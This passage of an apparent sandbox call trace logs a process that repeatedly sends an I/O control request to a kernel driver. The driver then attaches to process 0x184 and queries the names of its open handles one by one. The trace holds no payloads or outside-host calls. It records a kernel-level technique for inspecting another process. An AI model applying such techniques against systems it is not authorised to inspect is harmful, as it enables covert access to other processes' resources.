(Object=0xfffffa80018b95d0) returned 0x152 [0132.599] ObQueryNameString (in: Object=0xfffff8a00111bd00, ObjectNameInfo=0xfffffa8002f1f044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f1f044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.599] ObfDereferenceObject (Object=0xfffff8a00111bd00) returned 0x1 [0132.599] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.600] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.600] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.600] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.600] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.600] PsAcquireProcessExitSynchronization () returned 0x0 [0132.600] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.600] ObReferenceObjectByHandle (in: Handle=0x1f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001187a40, HandleInformation=0x0) returned 0x0 [0132.600] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.600] PsReleaseProcessExitSynchronization () returned 0x2 [0132.600] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.600] ObQueryNameString (in: Object=0xfffff8a001187a40, ObjectNameInfo=0xfffffa8002f63044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f63044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.600] ObfDereferenceObject (Object=0xfffff8a001187a40) returned 0x1 [0132.600] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.600] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.600] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.600] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.600] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.600] PsAcquireProcessExitSynchronization () returned 0x0 [0132.600] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.600] ObReferenceObjectByHandle (in: Handle=0x1fc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000ca62d0, HandleInformation=0x0) returned 0x0 [0132.601] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.601] PsReleaseProcessExitSynchronization () returned 0x2 [0132.601] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.601] ObQueryNameString (in: Object=0xfffff8a000ca62d0, ObjectNameInfo=0xfffffa8002f79344, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f79344, ReturnLength=0xfffff88005163550) returned 0x0 [0132.601] ObfDereferenceObject (Object=0xfffff8a000ca62d0) returned 0x1 [0132.601] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.601] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.601] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.601] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.601] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.601] PsAcquireProcessExitSynchronization () returned 0x0 [0132.601] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.601] ObReferenceObjectByHandle (in: Handle=0x200, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0011c6890, HandleInformation=0x0) returned 0x0 [0132.601] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.601] PsReleaseProcessExitSynchronization () returned 0x2 [0132.601] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.601] ObQueryNameString (in: Object=0xfffff8a0011c6890, ObjectNameInfo=0xfffffa8002f5e044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5e044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.601] ObfDereferenceObject (Object=0xfffff8a0011c6890) returned 0x1 [0132.601] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.602] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.602] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.602] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.602] PsAcquireProcessExitSynchronization () returned 0x0 [0132.602] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.602] ObReferenceObjectByHandle (in: Handle=0x208, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0011a3fc0, HandleInformation=0x0) returned 0x0 [0132.602] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.602] PsReleaseProcessExitSynchronization () returned 0x2 [0132.602] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.602] ObQueryNameString (in: Object=0xfffff8a0011a3fc0, ObjectNameInfo=0xfffffa80028c56c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80028c56c4, ReturnLength=0xfffff88005163550) returned 0x0 [0132.602] ObfDereferenceObject (Object=0xfffff8a0011a3fc0) returned 0x1 [0132.602] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.602] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.602] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.602] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.603] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.603] PsAcquireProcessExitSynchronization () returned 0x0 [0132.603] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.603] ObReferenceObjectByHandle (in: Handle=0x210, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0019f4af0, HandleInformation=0x0) returned 0x0 [0132.603] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.603] PsReleaseProcessExitSynchronization () returned 0x2 [0132.603] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.603] ObQueryNameString (in: Object=0xfffff8a0019f4af0, ObjectNameInfo=0xfffffa80029637c4, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa80029637c4, ReturnLength=0xfffff88005163550) returned 0x0 [0132.603] ObfDereferenceObject (Object=0xfffff8a0019f4af0) returned 0x1 [0132.603] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.603] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.603] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.603] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.603] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.603] PsAcquireProcessExitSynchronization () returned 0x0 [0132.603] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.603] ObReferenceObjectByHandle (in: Handle=0x220, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a001055e60, HandleInformation=0x0) returned 0x0 [0132.604] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.604] PsReleaseProcessExitSynchronization () returned 0x2 [0132.604] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.604] ObQueryNameString (in: Object=0xfffff8a001055e60, ObjectNameInfo=0xfffffa8002f06044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f06044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.604] ObfDereferenceObject (Object=0xfffff8a001055e60) returned 0x1 [0132.604] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.604] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.604] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.604] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.604] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.604] PsAcquireProcessExitSynchronization () returned 0x0 [0132.604] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.604] ObReferenceObjectByHandle (in: Handle=0x22c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00105bac0, HandleInformation=0x0) returned 0x0 [0132.604] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.604] PsReleaseProcessExitSynchronization () returned 0x2 [0132.604] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.604] ObQueryNameString (in: Object=0xfffff8a00105bac0, ObjectNameInfo=0xfffffa8002f2d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f2d044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.604] ObfDereferenceObject (Object=0xfffff8a00105bac0) returned 0x1 [0132.605] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.605] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.605] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.605] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.605] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.605] PsAcquireProcessExitSynchronization () returned 0x0 [0132.605] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.605] ObReferenceObjectByHandle (in: Handle=0x248, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0013268c0, HandleInformation=0x0) returned 0x0 [0132.605] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.605] PsReleaseProcessExitSynchronization () returned 0x2 [0132.605] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.605] ObQueryNameString (in: Object=0xfffff8a0013268c0, ObjectNameInfo=0xfffffa8002f5d044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5d044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.605] ObfDereferenceObject (Object=0xfffff8a0013268c0) returned 0x1 [0132.605] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.605] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.606] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.606] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.606] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.606] PsAcquireProcessExitSynchronization () returned 0x0 [0132.606] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.606] ObReferenceObjectByHandle (in: Handle=0x24c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0012c2e70, HandleInformation=0x0) returned 0x0 [0132.606] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.606] PsReleaseProcessExitSynchronization () returned 0x2 [0132.606] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.606] ObQueryNameString (in: Object=0xfffff8a0012c2e70, ObjectNameInfo=0xfffffa800289c044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa800289c044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.606] ObfDereferenceObject (Object=0xfffff8a0012c2e70) returned 0x1 [0132.606] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.606] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.606] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.606] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.606] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.606] PsAcquireProcessExitSynchronization () returned 0x0 [0132.606] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.606] ObReferenceObjectByHandle (in: Handle=0x258, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0013e11a0, HandleInformation=0x0) returned 0x0 [0132.606] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.606] PsReleaseProcessExitSynchronization () returned 0x2 [0132.606] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.607] ObQueryNameString (in: Object=0xfffff8a0013e11a0, ObjectNameInfo=0xfffffa8002f5b044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f5b044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.607] ObfDereferenceObject (Object=0xfffff8a0013e11a0) returned 0x1 [0132.607] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.607] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.607] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.607] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.607] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.607] PsAcquireProcessExitSynchronization () returned 0x0 [0132.607] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.607] ObReferenceObjectByHandle (in: Handle=0x268, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0013f0e00, HandleInformation=0x0) returned 0x0 [0132.607] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.607] PsReleaseProcessExitSynchronization () returned 0x2 [0132.607] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.607] ObQueryNameString (in: Object=0xfffff8a0013f0e00, ObjectNameInfo=0xfffffa8002f57044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f57044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.607] ObfDereferenceObject (Object=0xfffff8a0013f0e00) returned 0x1 [0132.607] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.607] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.607] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.607] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.608] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.608] PsAcquireProcessExitSynchronization () returned 0x0 [0132.608] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.608] ObReferenceObjectByHandle (in: Handle=0x278, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0013f7fc0, HandleInformation=0x0) returned 0x0 [0132.608] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.608] PsReleaseProcessExitSynchronization () returned 0x2 [0132.608] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.608] ObQueryNameString (in: Object=0xfffff8a0013f7fc0, ObjectNameInfo=0xfffffa8002f55044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002f55044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.608] ObfDereferenceObject (Object=0xfffff8a0013f7fc0) returned 0x1 [0132.608] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.608] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.608] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.608] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.608] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.608] PsAcquireProcessExitSynchronization () returned 0x0 [0132.608] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.609] ObReferenceObjectByHandle (in: Handle=0x27c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a0012d5b50, HandleInformation=0x0) returned 0x0 [0132.609] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.609] PsReleaseProcessExitSynchronization () returned 0x2 [0132.609] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.609] ObQueryNameString (in: Object=0xfffff8a0012d5b50, ObjectNameInfo=0xfffffa8002893044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002893044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.609] ObfDereferenceObject (Object=0xfffff8a0012d5b50) returned 0x1 [0132.609] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.609] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.609] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.609] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.609] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.609] PsAcquireProcessExitSynchronization () returned 0x0 [0132.609] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.609] ObReferenceObjectByHandle (in: Handle=0x288, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a00123f560, HandleInformation=0x0) returned 0x0 [0132.609] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.609] PsReleaseProcessExitSynchronization () returned 0x2 [0132.609] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.609] ObQueryNameString (in: Object=0xfffff8a00123f560, ObjectNameInfo=0xfffffa8002877044, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002877044, ReturnLength=0xfffff88005163550) returned 0x0 [0132.610] ObfDereferenceObject (Object=0xfffff8a00123f560) returned 0x1 [0132.610] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.610] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.610] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.610] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1e915e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1e915e0*, lpBytesReturned=0x12d450*=0x8, lpOverlapped=0x0) returned 1 [0132.610] PsLookupProcessByProcessId (in: ProcessId=0x184, Process=0xfffff88005163558 | out: Process=0xfffff88005163558) returned 0x0 [0132.610] PsAcquireProcessExitSynchronization () returned 0x0 [0132.610] KeStackAttachProcess (in: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0 | out: PROCESS=0xfffffa80018b95d0, ApcState=0xfffff880051635d0) [0132.610] ObReferenceObjectByHandle (in: Handle=0x28c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80025f0601, Object=0xfffff88005163548, HandleInformation=0x0 | out: Object=0xfffff88005163548*=0xfffff8a000f86700, HandleInformation=0x0) returned 0x0 [0132.610] KeUnstackDetachProcess (ApcState=0xfffff880051635d0) [0132.610] PsReleaseProcessExitSynchronization () returned 0x2 [0132.610] ObfDereferenceObject (Object=0xfffffa80018b95d0) returned 0x152 [0132.610] ObQueryNameString (in: Object=0xfffff8a000f86700, ObjectNameInfo=0xfffffa8002540344, Length=0x800, ReturnLength=0xfffff88005163550 | out: ObjectNameInfo=0xfffffa8002540344, ReturnLength=0xfffff88005163550) returned 0x0 [0132.610] ObfDereferenceObject (Object=0xfffff8a000f86700) returned 0x1 [0132.610] IofCompleteRequest (Irp=0xfffffa800c187a90, PriorityBoost=0) [0132.611] HeapFree (in: hHeap=0x290000, dwFlags=0x0, lpMem=0x1e915e0 | out: hHeap=0x290000) returned 1 [0132.611] RtlAllocateHeap (HeapHandle=0x290000, Flags=0x0, Size=0x808) returned 0x1e915e0 [0132.611] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, 